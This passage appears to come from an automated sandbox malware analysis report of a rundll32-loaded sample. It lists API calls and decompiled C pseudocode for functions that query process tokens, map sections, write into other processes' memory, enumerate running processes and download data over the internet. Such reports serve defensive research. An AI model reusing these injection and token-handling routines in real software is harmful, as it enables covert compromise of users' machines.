                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 04F6C4C4
                            • memcpy.NTDLL(?,00000000,0000001C), ref: 04F6C4D1
                            • NtClose.NTDLL(?), ref: 04F6C4E3
                            • NtClose.NTDLL(?), ref: 04F6C4ED
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: a80811a4416b76d9e69432ecbcc6a96b5b7072f7c809fb68ceab833221ab3bd4
                            • Instruction ID: 209c167c41ff45cf74443988f3eebd759ac09007163a534548a0f5abe46d235b
                            • Opcode Fuzzy Hash: a80811a4416b76d9e69432ecbcc6a96b5b7072f7c809fb68ceab833221ab3bd4
                            • Instruction Fuzzy Hash: 952114B290021CBBDB01EF95DC45AEEBFBDEF08740F104066F901EA160D7759A41DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A14321 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 38%
                            			E04A14321(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04A16D63(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04A16C2C(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                            0x04a1432e
                            0x04a1432f
                            0x04a14330
                            0x04a14331
                            0x04a14332
                            0x04a14336
                            0x04a1433d
                            0x04a1434c
                            0x04a1434f
                            0x04a14352
                            0x04a14359
                            0x04a1435c
                            0x04a1435f
                            0x04a14362
                            0x04a14365
                            0x04a14370
                            0x04a14372
                            0x04a1437b
                            0x04a14383
                            0x04a14385
                            0x04a14397
                            0x04a143a1
                            0x04a143a5
                            0x04a143b4
                            0x04a143b8
                            0x04a143c1
                            0x04a143c9
                            0x04a143c9
                            0x04a143cb
                            0x04a143cb
                            0x04a143d3
                            0x04a143d9
                            0x04a143dd
                            0x04a143dd
                            0x04a143e8

                            APIs
                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04A14368
                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04A1437B
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04A14397
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04A143B4
                            • memcpy.NTDLL(?,00000000,0000001C), ref: 04A143C1
                            • NtClose.NTDLL(?), ref: 04A143D3
                            • NtClose.NTDLL(00000000), ref: 04A143DD
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: 2281a71ed8c6167356dca8e03074c6a59b1247413d9524e201f896c131776f03
                            • Instruction ID: ea4fa974ae1e99a6898f4278f60c14154b39b1c11e93617ac855c28b6595160a
                            • Opcode Fuzzy Hash: 2281a71ed8c6167356dca8e03074c6a59b1247413d9524e201f896c131776f03
                            • Instruction Fuzzy Hash: FA21E9B1900118BBEF019F95DD85ADEBFBDEF08740F104016F905E6120D7B19A55DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F76DE0 Relevance: 9.2, APIs: 6, Instructions: 238nativeCOMMON
                            Download Yara Rule
                            APIs
                            • memcpy.NTDLL(?,?,?,04F6C71A,?,?,?,?,?,04F6C71A,?,?,00000000), ref: 04F76F59
                              • Part of subcall function 04F6C4FB: GetModuleHandleA.KERNEL32(?,?,?,04F77017,?,?,?,00000000), ref: 04F6C539
                              • Part of subcall function 04F6C4FB: memcpy.NTDLL(?,04F8A30C,00000018,?,?,?), ref: 04F6C5B5
                            • memcpy.NTDLL(?,?,00000018,04F6C71A,?,?,?,?,?,04F6C71A,?,?,00000000), ref: 04F76FA7
                            • memcpy.NTDLL(?,04F7DD8F,00000800,?,?,?,00000000), ref: 04F7702A
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 04F77068
                            • NtClose.NTDLL(00000000,?,00000000), ref: 04F7708F
                              • Part of subcall function 04F78F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,04F6C71A,04F6C71A,?,04F76EFA,?,04F6C71A,?,?,00000000), ref: 04F78F87
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F78FA9
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F78FBF
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F78FD5
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F78FEB
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F79001
                              • Part of subcall function 04F7BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,04F6717E,00000000,00000000,04F6717E,?,00000002,00000000,?,04F6C71A,00000000,04F6717E,000000FF,?), ref: 04F7BEAE
                              • Part of subcall function 04F71CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,04F6C71A,?,?,00000000), ref: 04F71D58
                              • Part of subcall function 04F71CE4: memcpy.NTDLL(?,?,?), ref: 04F71DBF
                            • memset.NTDLL ref: 04F770AA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                            • String ID:
                            • API String ID: 3674896251-0
                            • Opcode ID: b44599f369bf8957862984120ee653071dcedb557197176a11005ea7c14649fc
                            • Instruction ID: 6d58bd93ec24870682434f00c11cc9f6a2127a827ba687bf329093167df7d75b
                            • Opcode Fuzzy Hash: b44599f369bf8957862984120ee653071dcedb557197176a11005ea7c14649fc
                            • Instruction Fuzzy Hash: 95A12E71E0060ADFDB11DF98C884AAEBBF4FF04304F14456AE915A7250E739BA56DF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11CA5 Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E04A11CA5(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				long _t47;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x4a1a174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E04A16D63(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04A16E40( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E04A16C2C(_v16);
										if(_t64 == 0) {
											_t47 = E04A115CC(_v12, _t69); // executed
											_t64 = _t47;
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04A16E40( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04A14A85(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                            0x04a11ca5
                            0x04a11ca6
                            0x04a11cac
                            0x04a11cb7
                            0x04a11cb7
                            0x04a11cb9
                            0x04a17395
                            0x04a1739a
                            0x04a1739c
                            0x04a173b3
                            0x04a173e4
                            0x04a173e9
                            0x04a174ac
                            0x04a173ef
                            0x04a173f6
                            0x04a173fe
                            0x04a174a9
                            0x04a17404
                            0x04a17409
                            0x04a1740e
                            0x04a17413
                            0x04a1749b
                            0x04a17419
                            0x04a17419
                            0x04a1741b
                            0x04a17421
                            0x04a17422
                            0x04a17422
                            0x04a17425
                            0x04a17428
                            0x04a1742e
                            0x04a1743f
                            0x04a17447
                            0x00000000
                            0x00000000
                            0x04a1744f
                            0x04a17457
                            0x04a17463
                            0x04a17467
                            0x04a17469
                            0x04a1746e
                            0x00000000
                            0x00000000
                            0x04a1746e
                            0x04a17467
                            0x04a17480
                            0x04a17483
                            0x04a1748a
                            0x04a17490
                            0x04a17495
                            0x04a17495
                            0x00000000
                            0x04a17470
                            0x04a17470
                            0x04a17475
                            0x04a17477
                            0x04a17478
                            0x04a1747b
                            0x00000000
                            0x04a1747b
                            0x00000000
                            0x04a17475
                            0x04a17422
                            0x04a1749c
                            0x04a1749c
                            0x04a174a2
                            0x04a174a2
                            0x04a173fe
                            0x04a173b5
                            0x04a173bb
                            0x04a173c3
                            0x04a173dc
                            0x04a173de
                            0x00000000
                            0x00000000
                            0x04a173c5
                            0x04a173cf
                            0x04a173d3
                            0x04a173d9
                            0x00000000
                            0x04a173d9
                            0x04a173d3
                            0x04a173c3
                            0x04a174b5
                            0x04a11cae
                            0x04a11cae
                            0x04a11cb5
                            0x04a11cc0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a11cb5

                            APIs
                            • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,761F81D0,00000000,00000000), ref: 04A1739C
                            • InternetReadFile.WININET(?,?,00000004,?), ref: 04A173AB
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?,?), ref: 04A173B5
                            • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A1742E
                            • InternetReadFile.WININET(?,?,00001000,?), ref: 04A1743F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?,?), ref: 04A17449
                              • Part of subcall function 04A14A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,761F81D0,00000000,00000000), ref: 04A14A9C
                              • Part of subcall function 04A14A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A14AAC
                              • Part of subcall function 04A14A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04A14ADE
                              • Part of subcall function 04A14A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A14B03
                              • Part of subcall function 04A14A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A14B23
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                            • String ID:
                            • API String ID: 2393427839-0
                            • Opcode ID: 32f5ac24e70e4fad8ee3605ab51a23d0e0bbc08f5f53f3b53fd96f3ef10d92b5
                            • Instruction ID: 45aa6929994207f104a1e3d91b648ff84e9b250849d739b183081e0ae09489b2
                            • Opcode Fuzzy Hash: 32f5ac24e70e4fad8ee3605ab51a23d0e0bbc08f5f53f3b53fd96f3ef10d92b5
                            • Instruction Fuzzy Hash: D141153A600614AFDB219FA4CC40BAFBBBAEF88360F154528E556D71B0EB70F941CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F72331 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04F7235C
                            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 04F72369
                            • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04F723F5
                            • GetModuleHandleA.KERNEL32(00000000), ref: 04F72400
                            • RtlImageNtHeader.NTDLL(00000000), ref: 04F72409
                            • RtlExitUserThread.NTDLL(00000000), ref: 04F7241E
                              • Part of subcall function 04F70818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F72397,?), ref: 04F70820
                              • Part of subcall function 04F70818: GetVersion.KERNEL32 ref: 04F7082F
                              • Part of subcall function 04F70818: GetCurrentProcessId.KERNEL32 ref: 04F7084B
                              • Part of subcall function 04F70818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04F70868
                              • Part of subcall function 04F6C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 04F6C815
                              • Part of subcall function 04F6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04F67D5E), ref: 04F6A6BE
                              • Part of subcall function 04F7212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,04F6111D,00000000), ref: 04F7214D
                              • Part of subcall function 04F7212C: GetProcAddress.KERNEL32(00000000,?), ref: 04F72166
                              • Part of subcall function 04F7212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04F6111D,00000000), ref: 04F72183
                              • Part of subcall function 04F7212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,04F6111D,00000000), ref: 04F72194
                              • Part of subcall function 04F7212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,04F6111D,00000000), ref: 04F721A7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                            • String ID:
                            • API String ID: 2581485877-0
                            • Opcode ID: f6fd61859e74cb724890850492217f22773a159d9682ee0e2cd399520f69d817
                            • Instruction ID: 6449f500561605a4d0cce92484c73ce4f89b08a934792438cd217c979890b196
                            • Opcode Fuzzy Hash: f6fd61859e74cb724890850492217f22773a159d9682ee0e2cd399520f69d817
                            • Instruction Fuzzy Hash: 7531C032E00118AFCB12AFB4EC84E7E77A8EB45754F12416EE506EB201D738AD46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A168BD Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E04A168BD() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4a1a348; // 0xb1d5a8
						_t2 = _t9 + 0x4a1beb0; // 0x73617661
						_push( &_v264);
						if( *0x4a1a12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                            0x04a168c8
                            0x04a168cd
                            0x04a168d2
                            0x04a168d6
                            0x04a168e0
                            0x04a16911
                            0x04a168e7
                            0x04a168ec
                            0x04a168f9
                            0x04a16902
                            0x04a16919
                            0x04a16904
                            0x04a1690c
                            0x00000000
                            0x04a1690c
                            0x04a1691a
                            0x04a1691b
                            0x00000000
                            0x04a1691b
                            0x00000000
                            0x04a16915
                            0x04a16921
                            0x04a16926

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A168CD
                            • Process32First.KERNEL32(00000000,?), ref: 04A168E0
                            • Process32Next.KERNEL32(00000000,?), ref: 04A1690C
                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 04A1691B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3243318325-0
                            • Opcode ID: 14bfaf66334c1e1bf7eb0cb88744cfd791afdf5d9f33bed9badf99db2d650a71
                            • Instruction ID: b7676636ec35756119909c29330e74a7e454172a62fb7eb11f9bf5d543e73899
                            • Opcode Fuzzy Hash: 14bfaf66334c1e1bf7eb0cb88744cfd791afdf5d9f33bed9badf99db2d650a71
                            • Instruction Fuzzy Hash: 87F0BBB62011146BE720AB769D48EEB37ACDBC5315F0000A1EE45D3020EB24FE4AC661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6710A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000), ref: 04F67167
                              • Part of subcall function 04F7BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,04F6717E,00000000,00000000,04F6717E,?,00000002,00000000,?,04F6C71A,00000000,04F6717E,000000FF,?), ref: 04F7BEAE
                            • memset.NTDLL ref: 04F6718B
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID: @
                            • API String ID: 2533685722-2766056989
                            • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                            • Instruction ID: dac90817f790fbdfef35c35a4fa1b853f3e02f831f68cb490cac611bd596cafe
                            • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                            • Instruction Fuzzy Hash: 7321FCB6D00209AFDB11DFA9C8809EEFBF9EB48354F10452AE516F7250D630AA458F60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F761AE Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcAddress.KERNEL32(?,00000318), ref: 04F761D3
                            • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04F761EF
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                              • Part of subcall function 04F7A806: GetProcAddress.KERNEL32(?,00000000), ref: 04F7A82F
                              • Part of subcall function 04F7A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04F76230,00000000,00000000,00000028,00000100), ref: 04F7A851
                            • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04F76359
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                            • String ID:
                            • API String ID: 3547194813-0
                            • Opcode ID: a19b3321ae5cd624dd8b137fd86f348b1d8802ac424fb894d47391f9fd5b1e5f
                            • Instruction ID: 9988fb2ef48460ad06bcf67cbfdc0c188eae725b7b527f50dd58bb34f6beefde
                            • Opcode Fuzzy Hash: a19b3321ae5cd624dd8b137fd86f348b1d8802ac424fb894d47391f9fd5b1e5f
                            • Instruction Fuzzy Hash: 36612F71E0060AABEF55DF94C880BAEB7B4FF08314F10455AE914EB391D778E956CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F70782 Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F70796
                            • GetProcAddress.KERNEL32(?), ref: 04F707BE
                            • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04F707DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressInformationProcProcess64QueryWow64memset
                            • String ID:
                            • API String ID: 2968673968-0
                            • Opcode ID: fbb68ee809242cffa8337450d5dc1372bb970260886d903be7419f9779d304ce
                            • Instruction ID: 0ada9e8df7962789f72add79e1dda61ff624b1db99cb644fbaaff104acceccdf
                            • Opcode Fuzzy Hash: fbb68ee809242cffa8337450d5dc1372bb970260886d903be7419f9779d304ce
                            • Instruction Fuzzy Hash: F2113375A0111DAFEB10DB94EC45FAA77A8EF44744F05402AE904EF290DB78ED06CF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F77950 Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtAllocateVirtualMemory.NTDLL(04F7EB0F,00000000,00000000,04F7EB0F,00003000,00000040), ref: 04F77981
                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04F77988
                            • SetLastError.KERNEL32(00000000), ref: 04F7798F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$AllocateLastMemoryStatusVirtual
                            • String ID:
                            • API String ID: 722216270-0
                            • Opcode ID: 20910521b9fb9256d9a0eb97754dbcb9dd6d21ca744a8a665ec3a55c817272d3
                            • Instruction ID: f1a53a56a84f44de751163f5d9610bc50907fd9151cae7ff4d4e8eba43f610ec
                            • Opcode Fuzzy Hash: 20910521b9fb9256d9a0eb97754dbcb9dd6d21ca744a8a665ec3a55c817272d3
                            • Instruction Fuzzy Hash: 2DF0FEB1921309FBEB05DB94D909FAE7ABCEB44359F104048A600AA180DBB8AB04DB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F75312 Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,761B6780,?,04F7907F,?,00000004,00000000,00000004,?), ref: 04F75330
                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 04F7533F
                            • SetLastError.KERNEL32(00000000,?,04F7907F,?,00000004,00000000,00000004,?,?,?,?,04F6C691,?,00000000,CCCCFEEB,?), ref: 04F75346
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$LastMemoryStatusVirtualWrite
                            • String ID:
                            • API String ID: 1089604434-0
                            • Opcode ID: 350a402272ed90be9762b3618923f34f5f2657c8b255ab0f1be4e5b8edc15457
                            • Instruction ID: 220bd08edbd6da755d9b314ed134fcfffd5f70f4f73dad4dfe8cad30c58a5641
                            • Opcode Fuzzy Hash: 350a402272ed90be9762b3618923f34f5f2657c8b255ab0f1be4e5b8edc15457
                            • Instruction Fuzzy Hash: 0CE09A3660021EBBCF015EE8AC04DAE7F6AEB48751B405019FE05D6520D679D861ABA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1190C Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E04A1190C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E04A16D0A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                            0x04a11915
                            0x04a1191c
                            0x04a1191d
                            0x04a1191e
                            0x04a1191f
                            0x04a11920
                            0x04a11931
                            0x04a11935
                            0x04a11949
                            0x04a1194c
                            0x04a1194f
                            0x04a11956
                            0x04a11959
                            0x04a11960
                            0x04a11963
                            0x04a11966
                            0x04a11969
                            0x04a1196e
                            0x04a119a9
                            0x04a11970
